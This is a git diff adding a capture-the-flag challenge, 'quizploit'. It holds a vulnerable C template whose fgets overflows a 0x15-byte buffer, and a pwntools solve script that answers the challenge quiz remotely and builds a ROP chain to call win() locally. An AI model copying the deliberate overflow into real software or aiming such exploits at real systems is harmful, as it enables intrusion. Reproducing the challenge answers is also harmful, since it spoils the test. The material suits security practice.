diff --git a/pwn/quizploit/flag.txt b/pwn/quizploit/flag.txt new file mode 100644 index 0000000..7f34d3c --- /dev/null +++ b/pwn/quizploit/flag.txt @@ -0,0 +1 @@ +picoCTF{dummy} diff --git a/pwn/quizploit/solve.py b/pwn/quizploit/solve.py new file mode 100755 index 0000000..6f8b33d --- /dev/null +++ b/pwn/quizploit/solve.py @@ -0,0 +1,70 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])" + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "lonely-island.picoctf.net 54976".split() + +def conn() -> remote: + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def answers(r: remote) -> None: + print('Q1') + r.sendlineafter(b">> ", b"64-bit") + print('Q2') + r.sendlineafter(b">> ", b"dynamic") + print('Q3') + r.sendlineafter(b">> ", b"not stripped") + print('Q4') + r.sendlineafter(b">> ", b"0x15") + print('Q5') + r.sendlineafter(b">> ", b"0x90") + print('Q6') + r.sendlineafter(b">> ", b"yes") + print('Q7') + r.sendlineafter(b">> ", b"fgets") + print('Q8') + r.sendlineafter(b">> ", b"win") + print('Q9') + r.sendlineafter(b">> ", b"buffer overflow") + print('Q10') + r.sendlineafter(b">> ", hex(0x90 - 0x15).encode()) + print('Q11') + r.sendlineafter(b">> ", b"NX") + print('Q12') + r.sendlineafter(b">> ", b"ROP") + print('Q13') + r.sendlineafter(b">> ", hex(exe.symbols['win']).encode()) + print('Q14') + result = r.recvline_contains(b"picoCTF{").decode().strip() + print(result) + r.close() + +def main() -> None: + + r = conn() + if args.REMOTE: + answers(r) + else: + offset = 40 + + rop = ROP(exe) + rop.raw(rop.generatePadding(0, offset)) + rop.raw(rop.ret.address) + rop.win() + r.sendline(rop.chain()) + + print(r.recvall().decode(), end='') + r.close() + +if __name__ == "__main__": + main() diff --git a/pwn/quizploit/vuln b/pwn/quizploit/vuln new file mode 100755 index 0000000..41bc8d1 Binary files /dev/null and b/pwn/quizploit/vuln differ diff --git a/pwn/quizploit/vuln.c b/pwn/quizploit/vuln.c new file mode 100644 index 0000000..eb5c82f --- /dev/null +++ b/pwn/quizploit/vuln.c @@ -0,0 +1,24 @@ +#include +#include + +/* +This is not the challenge, just a template to answer the questions. +To get the flag, answer all the questions. +There are no bugs in the quiz. +There are 0xD questions in total. + +*/ + +void win(){ + system("cat flag.txt"); +} + +void vuln(){ + char buffer[0x15] = {0}; + fprintf(stdout, "\nEnter payload: "); + fgets(buffer, 0x90, stdin); +} + +void main(){ + vuln(); +}